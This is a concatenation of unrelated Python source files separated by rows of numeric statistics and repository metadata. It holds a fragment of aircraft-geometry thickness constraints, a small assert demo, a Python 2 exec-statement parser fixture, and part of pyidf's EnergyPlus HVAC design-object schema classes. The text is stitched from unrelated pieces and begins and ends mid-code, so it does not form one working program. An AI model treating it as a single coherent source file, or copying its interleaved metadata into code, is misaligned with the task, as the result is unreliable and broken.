        nDV = self.DVGeo.getNDV()
        if nDV > 0:
            # d(thickness_i)/d(point): only the two endpoints of pair i have
            # nonzero entries, filled from the reverse-mode distance helper.
            dTdPt = np.zeros((self.nCon, self.coords.shape[0], self.coords.shape[1]))
            for i in range(self.nCon):
                p1b, p2b = geo_utils.eDist_b(self.coords[2 * i, :], self.coords[2 * i + 1, :])
                if self.scaled:
                    # Match the D/D0 scaling applied in evalFunctions.
                    p1b /= self.D0[i]
                    p2b /= self.D0[i]
                dTdPt[i, 2 * i, :] = p1b
                dTdPt[i, 2 * i + 1, :] = p2b
            funcsSens[self.name] = self.DVGeo.totalSensitivity(dTdPt, self.name, config=config)

    def writeTecplot(self, handle):
        """
        Write the visualization of this set of thickness constraints
        to the open file handle
        """
        # One FELINESEG zone: every coordinate as a node, every pair as a
        # line segment (Tecplot node numbering is 1-based).
        handle.write("Zone T=%s\n" % self.name)
        handle.write("Nodes = %d, Elements = %d ZONETYPE=FELINESEG\n" % (len(self.coords), len(self.coords) // 2))
        handle.write("DATAPACKING=POINT\n")
        for i in range(len(self.coords)):
            handle.write(f"{self.coords[i, 0]:f} {self.coords[i, 1]:f} {self.coords[i, 2]:f}\n")
        for i in range(len(self.coords) // 2):
            handle.write("%d %d\n" % (2 * i + 1, 2 * i + 2))
class ThicknessToChordConstraint(GeometricConstraint):
    """
    ThicknessToChordConstraint represents of a set of
    thickess-to-chord ratio constraints. One of these objects is
    created each time a addThicknessToChordConstraints2D or
    addThicknessToChordConstraints1D call is made. The user should not
    have to deal with this class directly.

    Each constraint i uses FOUR coordinates: (4*i, 4*i + 1) span the
    thickness t and (4*i + 2, 4*i + 3) span the chord c; the reported
    value is (t/c) normalized by its initial ratio ToC0.
    """

    def __init__(self, name, coords, lower, upper, scale, DVGeo, addToPyOpt, compNames):
        # Four coordinates per constraint, hence nCon = len(coords) // 4.
        super().__init__(name, len(coords) // 4, lower, upper, scale, DVGeo, addToPyOpt)
        self.coords = coords

        # First thing we can do is embed the coordinates into DVGeo
        # with the name provided:
        self.DVGeo.addPointSet(self.coords, self.name, compNames=compNames)

        # Now get the reference lengths: the initial thickness-to-chord
        # ratio of each constraint, used to normalize later evaluations.
        self.ToC0 = np.zeros(self.nCon)
        for i in range(self.nCon):
            t = np.linalg.norm(self.coords[4 * i] - self.coords[4 * i + 1])
            c = np.linalg.norm(self.coords[4 * i + 2] - self.coords[4 * i + 3])
            self.ToC0[i] = t / c

    def evalFunctions(self, funcs, config):
        """
        Evaluate the functions this object has and place in the funcs dictionary

        Parameters
        ----------
        funcs : dict
            Dictionary to place function values
        """
        # Pull out the most recent set of coordinates:
        self.coords = self.DVGeo.update(self.name, config=config)
        ToC = np.zeros(self.nCon)
        for i in range(self.nCon):
            t = geo_utils.eDist(self.coords[4 * i], self.coords[4 * i + 1])
            c = geo_utils.eDist(self.coords[4 * i + 2], self.coords[4 * i + 3])
            # Always normalized by the initial ratio (starts at 1.0).
            ToC[i] = (t / c) / self.ToC0[i]
        funcs[self.name] = ToC

    def evalFunctionsSens(self, funcsSens, config):
        """
        Evaluate the sensitivity of the functions this object has and
        place in the funcsSens dictionary

        Parameters
        ----------
        funcsSens : dict
            Dictionary to place function values
        """
        nDV = self.DVGeo.getNDV()
        if nDV > 0:
            dToCdPt = np.zeros((self.nCon, self.coords.shape[0], self.coords.shape[1]))
            for i in range(self.nCon):
                t = geo_utils.eDist(self.coords[4 * i], self.coords[4 * i + 1])
                c = geo_utils.eDist(self.coords[4 * i + 2], self.coords[4 * i + 3])
                # Reverse-mode seeds of the two distances w.r.t. their endpoints.
                p1b, p2b = geo_utils.eDist_b(self.coords[4 * i, :], self.coords[4 * i + 1, :])
                p3b, p4b = geo_utils.eDist_b(self.coords[4 * i + 2, :], self.coords[4 * i + 3, :])
                # Quotient rule for (t/c)/ToC0: thickness endpoints get +1/c,
                # chord endpoints get -t/c^2.
                dToCdPt[i, 4 * i, :] = p1b / c / self.ToC0[i]
                dToCdPt[i, 4 * i + 1, :] = p2b / c / self.ToC0[i]
                dToCdPt[i, 4 * i + 2, :] = (-p3b * t / c ** 2) / self.ToC0[i]
                dToCdPt[i, 4 * i + 3, :] = (-p4b * t / c ** 2) / self.ToC0[i]
            funcsSens[self.name] = self.DVGeo.totalSensitivity(dToCdPt, self.name, config=config)

    def writeTecplot(self, handle):
        """
        Write the visualization of this set of thickness constraints
        to the open file handle
        """
        # Pairs (1,2), (3,4), ... become line segments, which for this class
        # draws both the thickness and the chord segment of each constraint.
        handle.write("Zone T=%s\n" % self.name)
        handle.write("Nodes = %d, Elements = %d ZONETYPE=FELINESEG\n" % (len(self.coords), len(self.coords) // 2))
        handle.write("DATAPACKING=POINT\n")
        for i in range(len(self.coords)):
            handle.write(f"{self.coords[i, 0]:f} {self.coords[i, 1]:f} {self.coords[i, 2]:f}\n")
        for i in range(len(self.coords) // 2):
            handle.write("%d %d\n" % (2 * i + 1, 2 * i + 2))
| 38.892655
| 114
| 0.559849
| 895
| 6,884
| 4.275978
| 0.163128
| 0.120199
| 0.045989
| 0.05017
| 0.841651
| 0.841651
| 0.815783
| 0.804547
| 0.755945
| 0.722759
| 0
| 0.021609
| 0.29416
| 6,884
| 176
| 115
| 39.113636
| 0.766001
| 0.261621
| 0
| 0.525
| 0
| 0.025
| 0.063613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.0375
| 0
| 0.1625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
62f907dd7be7d32d307e2a352ac10a9affc6d2d7
| 78
|
py
|
Python
|
src/assert.py
|
kylerlmy/pythonpractice
|
6bdd329ac9adfc98c1cc4c37cc8581adad6018ad
|
[
"MIT"
] | null | null | null |
src/assert.py
|
kylerlmy/pythonpractice
|
6bdd329ac9adfc98c1cc4c37cc8581adad6018ad
|
[
"MIT"
] | null | null | null |
src/assert.py
|
kylerlmy/pythonpractice
|
6bdd329ac9adfc98c1cc4c37cc8581adad6018ad
|
[
"MIT"
] | null | null | null |
# Demonstration of the `assert` statement.
mylist=['item']
# Holds: the list has exactly one element.
assert len(mylist) >=1
mylist.pop()
# After pop() the list is empty, so this assertion raises AssertionError —
# NOTE(review): presumably the intended demonstration of a failing assert;
# confirm before "fixing".
assert len(mylist)>=1
| 8.666667
| 22
| 0.653846
| 12
| 78
| 4.25
| 0.5
| 0.352941
| 0.588235
| 0.627451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029851
| 0.141026
| 78
| 9
| 23
| 8.666667
| 0.731343
| 0
| 0
| 0.5
| 0
| 0
| 0.051948
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1a1d0aca9ad7a1f8c6a3b5c0f2abf87826eb5231
| 188
|
py
|
Python
|
example/python2/test/parse/exec.py
|
rocky/python-spark
|
d3f966a4e8c191c51b1dcfa444026b4c6831984f
|
[
"MIT"
] | 43
|
2016-04-24T15:20:16.000Z
|
2022-03-19T21:01:29.000Z
|
example/python2/test/format/exec.py
|
rocky/python-spark
|
d3f966a4e8c191c51b1dcfa444026b4c6831984f
|
[
"MIT"
] | 11
|
2016-06-01T16:06:38.000Z
|
2020-05-20T20:15:32.000Z
|
example/python2/test/parse/exec.py
|
rocky/python-spark
|
d3f966a4e8c191c51b1dcfa444026b4c6831984f
|
[
"MIT"
] | 12
|
2016-05-24T12:15:04.000Z
|
2021-11-20T02:14:00.000Z
|
# Parsing and formatting tests for:
#
#  exec_stmt ::=
#      'exec' expr ['in' test [',' test]]
#
# NOTE: Python 2 only — `exec` is a statement here.  These lines are parser
# fixtures exercising the 0-, 1- and 2-target forms of the grammar rule; they
# are not meant to be executed for their effects.
exec 'exec-string' in locals, globals
exec 'exec-string' in dict
exec 'exec-string'
| 20.888889
| 48
| 0.62766
| 26
| 188
| 4.5
| 0.538462
| 0.205128
| 0.358974
| 0.273504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218085
| 188
| 8
| 49
| 23.5
| 0.795918
| 0.5
| 0
| 0
| 0
| 0
| 0.370787
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c50f015e5e48cbb94961522c7fdbd3de007eb575
| 183,710
|
py
|
Python
|
pyidf/hvac_design_objects.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 19
|
2015-12-08T23:33:51.000Z
|
2022-01-31T04:41:10.000Z
|
pyidf/hvac_design_objects.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 2
|
2019-10-04T10:57:00.000Z
|
2021-10-01T06:46:17.000Z
|
pyidf/hvac_design_objects.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 7
|
2015-11-04T02:25:01.000Z
|
2021-12-08T03:14:28.000Z
|
""" Data objects in group "HVAC Design Objects"
"""
from collections import OrderedDict
import logging
from pyidf.helper import DataObject
# Library-style logging: attach a NullHandler so pyidf stays silent unless
# the host application configures logging itself.
logger = logging.getLogger("pyidf")
logger.addHandler(logging.NullHandler())
class DesignSpecificationOutdoorAir(DataObject):

    """ Corresponds to IDD object `DesignSpecification:OutdoorAir`
        This object is used to describe general outdoor air requirements which
        are referenced by other objects.
    """
    # NOTE: auto-generated field schema mirroring the EnergyPlus IDD entry;
    # field access below goes through DataObject's __getitem__/__setitem__
    # keyed by the human-readable field names.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'outdoor air method',
                                       {'name': u'Outdoor Air Method',
                                        'pyname': u'outdoor_air_method',
                                        'default': u'Flow/Person',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Flow/Person',
                                                            u'Flow/Area',
                                                            u'Flow/Zone',
                                                            u'AirChanges/Hour',
                                                            u'Sum',
                                                            u'Maximum'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'outdoor air flow per person',
                                       {'name': u'Outdoor Air Flow per Person',
                                        'pyname': u'outdoor_air_flow_per_person',
                                        'default': 0.00944,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s-person'}),
                                      (u'outdoor air flow per zone floor area',
                                       {'name': u'Outdoor Air Flow per Zone Floor Area',
                                        'pyname': u'outdoor_air_flow_per_zone_floor_area',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': 'real',
                                        'unit': u'm3/s-m2'}),
                                      (u'outdoor air flow per zone',
                                       {'name': u'Outdoor Air Flow per Zone',
                                        'pyname': u'outdoor_air_flow_per_zone',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'outdoor air flow air changes per hour',
                                       {'name': u'Outdoor Air Flow Air Changes per Hour',
                                        'pyname': u'outdoor_air_flow_air_changes_per_hour',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'1/hr'}),
                                      (u'outdoor air flow rate fraction schedule name',
                                       {'name': u'Outdoor Air Flow Rate Fraction Schedule Name',
                                        'pyname': u'outdoor_air_flow_rate_fraction_schedule_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'})]),
               'format': None,
               'group': u'HVAC Design Objects',
               'min-fields': 1,
               'name': u'DesignSpecification:OutdoorAir',
               'pyname': u'DesignSpecificationOutdoorAir',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def outdoor_air_method(self):
        """field `Outdoor Air Method`

        |  Flow/Person => Outdoor Air Flow per Person * Occupancy = Design Flow Rate,
        |  Flow/Area => Outdoor Air Flow per Zone Floor Area * Zone Floor Area = Design Flow Rate,
        |  Flow/Zone => Outdoor Air Flow per Zone = Design Flow Rate,
        |  AirChanges/Hour => Outdoor Air Flow Air Changes per Hour * Zone Volume adjusted for m3/s = Design Flow Rate
        |  Default value: Flow/Person

        Args:
            value (str): value for IDD Field `Outdoor Air Method`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `outdoor_air_method` or None if not set
        """
        return self["Outdoor Air Method"]

    @outdoor_air_method.setter
    def outdoor_air_method(self, value="Flow/Person"):
        """Corresponds to IDD field `Outdoor Air Method`"""
        self["Outdoor Air Method"] = value

    @property
    def outdoor_air_flow_per_person(self):
        """field `Outdoor Air Flow per Person`

        |  0.00944 m3/s is equivalent to 20 cfm per person
        |  This input should be used if the field Outdoor Air Method is Flow/Person.
        |  This input is used if the field Outdoor Air Method is Flow/Person, Sum, or Maximum
        |  Units: m3/s-person
        |  Default value: 0.00944

        Args:
            value (float): value for IDD Field `Outdoor Air Flow per Person`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `outdoor_air_flow_per_person` or None if not set
        """
        return self["Outdoor Air Flow per Person"]

    @outdoor_air_flow_per_person.setter
    def outdoor_air_flow_per_person(self, value=0.00944):
        """Corresponds to IDD field `Outdoor Air Flow per Person`"""
        self["Outdoor Air Flow per Person"] = value

    @property
    def outdoor_air_flow_per_zone_floor_area(self):
        """field `Outdoor Air Flow per Zone Floor Area`

        |  This input should be used if the field Outdoor Air Method is Flow/Area.
        |  This input is used if the field Outdoor Air Method is Flow/Area, Sum, or Maximum
        |  Units: m3/s-m2

        Args:
            value (float): value for IDD Field `Outdoor Air Flow per Zone Floor Area`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `outdoor_air_flow_per_zone_floor_area` or None if not set
        """
        return self["Outdoor Air Flow per Zone Floor Area"]

    @outdoor_air_flow_per_zone_floor_area.setter
    def outdoor_air_flow_per_zone_floor_area(self, value=None):
        """Corresponds to IDD field `Outdoor Air Flow per Zone Floor Area`"""
        self["Outdoor Air Flow per Zone Floor Area"] = value

    @property
    def outdoor_air_flow_per_zone(self):
        """field `Outdoor Air Flow per Zone`

        |  This input should be used if the field Outdoor Air Method is Flow/Zone.
        |  This input is used if the field Outdoor Air Method is Flow/Zone, Sum, or Maximum
        |  Units: m3/s

        Args:
            value (float): value for IDD Field `Outdoor Air Flow per Zone`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `outdoor_air_flow_per_zone` or None if not set
        """
        return self["Outdoor Air Flow per Zone"]

    @outdoor_air_flow_per_zone.setter
    def outdoor_air_flow_per_zone(self, value=None):
        """Corresponds to IDD field `Outdoor Air Flow per Zone`"""
        self["Outdoor Air Flow per Zone"] = value

    @property
    def outdoor_air_flow_air_changes_per_hour(self):
        """field `Outdoor Air Flow Air Changes per Hour`

        |  This input should be used if the field Outdoor Air Method is AirChanges/Hour.
        |  This input is used if the field Outdoor Air Method is AirChanges/Hour, Sum, or Maximum
        |  Units: 1/hr

        Args:
            value (float): value for IDD Field `Outdoor Air Flow Air Changes per Hour`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `outdoor_air_flow_air_changes_per_hour` or None if not set
        """
        return self["Outdoor Air Flow Air Changes per Hour"]

    @outdoor_air_flow_air_changes_per_hour.setter
    def outdoor_air_flow_air_changes_per_hour(self, value=None):
        """Corresponds to IDD field `Outdoor Air Flow Air Changes per Hour`"""
        self["Outdoor Air Flow Air Changes per Hour"] = value

    @property
    def outdoor_air_flow_rate_fraction_schedule_name(self):
        """field `Outdoor Air Flow Rate Fraction Schedule Name`

        |  Schedule values are multiplied by the Outdoor Air Flow rate calculated using
        |  the previous four inputs. Schedule values are limited to 0 to 1.

        Args:
            value (str): value for IDD Field `Outdoor Air Flow Rate Fraction Schedule Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `outdoor_air_flow_rate_fraction_schedule_name` or None if not set
        """
        return self["Outdoor Air Flow Rate Fraction Schedule Name"]

    @outdoor_air_flow_rate_fraction_schedule_name.setter
    def outdoor_air_flow_rate_fraction_schedule_name(self, value=None):
        """Corresponds to IDD field `Outdoor Air Flow Rate Fraction Schedule
        Name`"""
        self["Outdoor Air Flow Rate Fraction Schedule Name"] = value
class DesignSpecificationZoneAirDistribution(DataObject):
    """Corresponds to IDD object `DesignSpecification:ZoneAirDistribution`.

    This object is used to describe zone air distribution in terms of air
    distribution effectiveness and secondary recirculation fraction. It is
    referenced by Sizing:Zone and Controller:MechanicalVentilation objects.
    """

    # Auto-generated pyidf schema for this IDD object.  'fields' is an
    # OrderedDict keyed by the lower-cased IDD field name; its insertion
    # order mirrors the field order in the IDD and must not be changed.
    # NOTE(review): 'minimum>' appears to denote an exclusive lower bound
    # (vs. 'minimum' for an inclusive one) -- confirm against the pyidf
    # schema conventions.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'zone air distribution effectiveness in cooling mode',
                                       {'name': u'Zone Air Distribution Effectiveness in Cooling Mode',
                                        'pyname': u'zone_air_distribution_effectiveness_in_cooling_mode',
                                        'default': 1.0,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'zone air distribution effectiveness in heating mode',
                                       {'name': u'Zone Air Distribution Effectiveness in Heating Mode',
                                        'pyname': u'zone_air_distribution_effectiveness_in_heating_mode',
                                        'default': 1.0,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'zone air distribution effectiveness schedule name',
                                       {'name': u'Zone Air Distribution Effectiveness Schedule Name',
                                        'pyname': u'zone_air_distribution_effectiveness_schedule_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'zone secondary recirculation fraction',
                                       {'name': u'Zone Secondary Recirculation Fraction',
                                        'pyname': u'zone_secondary_recirculation_fraction',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'})]),
               'format': None,
               'group': u'HVAC Design Objects',
               'min-fields': 1,
               'name': u'DesignSpecification:ZoneAirDistribution',
               'pyname': u'DesignSpecificationZoneAirDistribution',
               'required-object': False,
               'unique-object': False}

    # Generated accessor pairs: each property reads the IDD field from the
    # DataObject item storage under the field's display name, and each
    # setter writes it back the same way.
    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def zone_air_distribution_effectiveness_in_cooling_mode(self):
        """field `Zone Air Distribution Effectiveness in Cooling Mode`

        | Units: dimensionless
        | Default value: 1.0

        Args:
            value (float): value for IDD Field `Zone Air Distribution Effectiveness in Cooling Mode`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `zone_air_distribution_effectiveness_in_cooling_mode` or None if not set
        """
        return self["Zone Air Distribution Effectiveness in Cooling Mode"]

    @zone_air_distribution_effectiveness_in_cooling_mode.setter
    def zone_air_distribution_effectiveness_in_cooling_mode(self, value=1.0):
        """Corresponds to IDD field `Zone Air Distribution Effectiveness in
        Cooling Mode`"""
        self["Zone Air Distribution Effectiveness in Cooling Mode"] = value

    @property
    def zone_air_distribution_effectiveness_in_heating_mode(self):
        """field `Zone Air Distribution Effectiveness in Heating Mode`

        | Units: dimensionless
        | Default value: 1.0

        Args:
            value (float): value for IDD Field `Zone Air Distribution Effectiveness in Heating Mode`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `zone_air_distribution_effectiveness_in_heating_mode` or None if not set
        """
        return self["Zone Air Distribution Effectiveness in Heating Mode"]

    @zone_air_distribution_effectiveness_in_heating_mode.setter
    def zone_air_distribution_effectiveness_in_heating_mode(self, value=1.0):
        """Corresponds to IDD field `Zone Air Distribution Effectiveness in
        Heating Mode`"""
        self["Zone Air Distribution Effectiveness in Heating Mode"] = value

    @property
    def zone_air_distribution_effectiveness_schedule_name(self):
        """field `Zone Air Distribution Effectiveness Schedule Name`

        | optionally used to replace Zone Air Distribution Effectiveness in Cooling and
        | Heating Mode

        Args:
            value (str): value for IDD Field `Zone Air Distribution Effectiveness Schedule Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `zone_air_distribution_effectiveness_schedule_name` or None if not set
        """
        return self["Zone Air Distribution Effectiveness Schedule Name"]

    @zone_air_distribution_effectiveness_schedule_name.setter
    def zone_air_distribution_effectiveness_schedule_name(self, value=None):
        """Corresponds to IDD field `Zone Air Distribution Effectiveness
        Schedule Name`"""
        self["Zone Air Distribution Effectiveness Schedule Name"] = value

    @property
    def zone_secondary_recirculation_fraction(self):
        """field `Zone Secondary Recirculation Fraction`

        | Units: dimensionless

        Args:
            value (float): value for IDD Field `Zone Secondary Recirculation Fraction`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `zone_secondary_recirculation_fraction` or None if not set
        """
        return self["Zone Secondary Recirculation Fraction"]

    @zone_secondary_recirculation_fraction.setter
    def zone_secondary_recirculation_fraction(self, value=None):
        """Corresponds to IDD field `Zone Secondary Recirculation Fraction`"""
        self["Zone Secondary Recirculation Fraction"] = value
class SizingParameters(DataObject):
    """Corresponds to IDD object `Sizing:Parameters`.

    Specifies global heating and cooling sizing factors/ratios.
    These ratios are applied at the zone level to all of the zone heating and cooling loads
    and air flow rates. Then these new loads and air flow rates are used to calculate the
    system level flow rates and capacities and are used in all component sizing calculations.
    Specifies the width (in load timesteps) of a moving average window
    which is used to smooth the peak load across more than one timestep.
    """

    # Auto-generated pyidf schema for this IDD object.  'fields' is an
    # OrderedDict keyed by the lower-cased IDD field name; its insertion
    # order mirrors the field order in the IDD and must not be changed.
    # NOTE(review): 'minimum>' appears to denote an exclusive lower bound
    # (vs. 'minimum' for an inclusive one) -- confirm against the pyidf
    # schema conventions.  This object is marked unique: only one
    # Sizing:Parameters is allowed per model ('unique-object': True).
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'heating sizing factor',
                                       {'name': u'Heating Sizing Factor',
                                        'pyname': u'heating_sizing_factor',
                                        'default': 1.0,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'cooling sizing factor',
                                       {'name': u'Cooling Sizing Factor',
                                        'pyname': u'cooling_sizing_factor',
                                        'default': 1.0,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'timesteps in averaging window',
                                       {'name': u'Timesteps in Averaging Window',
                                        'pyname': u'timesteps_in_averaging_window',
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 1,
                                        'autocalculatable': False,
                                        'type': u'integer'})]),
               'format': None,
               'group': u'HVAC Design Objects',
               'min-fields': 1,
               'name': u'Sizing:Parameters',
               'pyname': u'SizingParameters',
               'required-object': False,
               'unique-object': True}

    # Generated accessor pairs: each property reads the IDD field from the
    # DataObject item storage under the field's display name, and each
    # setter writes it back the same way.
    @property
    def heating_sizing_factor(self):
        """field `Heating Sizing Factor`

        | Default value: 1.0

        Args:
            value (float): value for IDD Field `Heating Sizing Factor`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `heating_sizing_factor` or None if not set
        """
        return self["Heating Sizing Factor"]

    @heating_sizing_factor.setter
    def heating_sizing_factor(self, value=1.0):
        """Corresponds to IDD field `Heating Sizing Factor`"""
        self["Heating Sizing Factor"] = value

    @property
    def cooling_sizing_factor(self):
        """field `Cooling Sizing Factor`

        | Default value: 1.0

        Args:
            value (float): value for IDD Field `Cooling Sizing Factor`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `cooling_sizing_factor` or None if not set
        """
        return self["Cooling Sizing Factor"]

    @cooling_sizing_factor.setter
    def cooling_sizing_factor(self, value=1.0):
        """Corresponds to IDD field `Cooling Sizing Factor`"""
        self["Cooling Sizing Factor"] = value

    @property
    def timesteps_in_averaging_window(self):
        """field `Timesteps in Averaging Window`

        | blank => set the timesteps in averaging window to
        | Number of Timesteps per Hour resulting in a 1 hour averaging window
        | default is number of timesteps for 1 hour averaging window
        | value >= 1

        Args:
            value (int): value for IDD Field `Timesteps in Averaging Window`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            int: the value of `timesteps_in_averaging_window` or None if not set
        """
        return self["Timesteps in Averaging Window"]

    @timesteps_in_averaging_window.setter
    def timesteps_in_averaging_window(self, value=None):
        """Corresponds to IDD field `Timesteps in Averaging Window`"""
        self["Timesteps in Averaging Window"] = value
class SizingZone(DataObject):
    """Corresponds to IDD object `Sizing:Zone`.

    Specifies the data needed to perform a zone design air flow calculation.
    The calculation is done for every sizing period included in the input. The maximum
    cooling and heating load and cooling, heating, and ventilation air flows are then saved
    for system level and zone component design calculations.
    """

    # Auto-generated pyidf schema for this IDD object.  'fields' is an
    # OrderedDict keyed by the lower-cased IDD field name; its insertion
    # order mirrors the field order in the IDD and must not be changed.
    # NOTE(review): the 'default': 'autosize' entries mark fields that are
    # autosizable ('autosizable': True) and autosized unless overridden --
    # confirm against the pyidf schema conventions.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'zone or zonelist name',
                                       {'name': u'Zone or ZoneList Name',
                                        'pyname': u'zone_or_zonelist_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      # -- supply air temperature inputs --
                                      (u'zone cooling design supply air temperature input method',
                                       {'name': u'Zone Cooling Design Supply Air Temperature Input Method',
                                        'pyname': u'zone_cooling_design_supply_air_temperature_input_method',
                                        'default': u'SupplyAirTemperature',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'SupplyAirTemperature',
                                                            u'TemperatureDifference'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'zone cooling design supply air temperature',
                                       {'name': u'Zone Cooling Design Supply Air Temperature',
                                        'pyname': u'zone_cooling_design_supply_air_temperature',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'C'}),
                                      (u'zone cooling design supply air temperature difference',
                                       {'name': u'Zone Cooling Design Supply Air Temperature Difference',
                                        'pyname': u'zone_cooling_design_supply_air_temperature_difference',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'deltaC'}),
                                      (u'zone heating design supply air temperature input method',
                                       {'name': u'Zone Heating Design Supply Air Temperature Input Method',
                                        'pyname': u'zone_heating_design_supply_air_temperature_input_method',
                                        'default': u'SupplyAirTemperature',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'SupplyAirTemperature',
                                                            u'TemperatureDifference'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'zone heating design supply air temperature',
                                       {'name': u'Zone Heating Design Supply Air Temperature',
                                        'pyname': u'zone_heating_design_supply_air_temperature',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'C'}),
                                      (u'zone heating design supply air temperature difference',
                                       {'name': u'Zone Heating Design Supply Air Temperature Difference',
                                        'pyname': u'zone_heating_design_supply_air_temperature_difference',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'deltaC'}),
                                      # -- supply air humidity ratios --
                                      (u'zone cooling design supply air humidity ratio',
                                       {'name': u'Zone Cooling Design Supply Air Humidity Ratio',
                                        'pyname': u'zone_cooling_design_supply_air_humidity_ratio',
                                        'required-field': True,
                                        'autosizable': False,
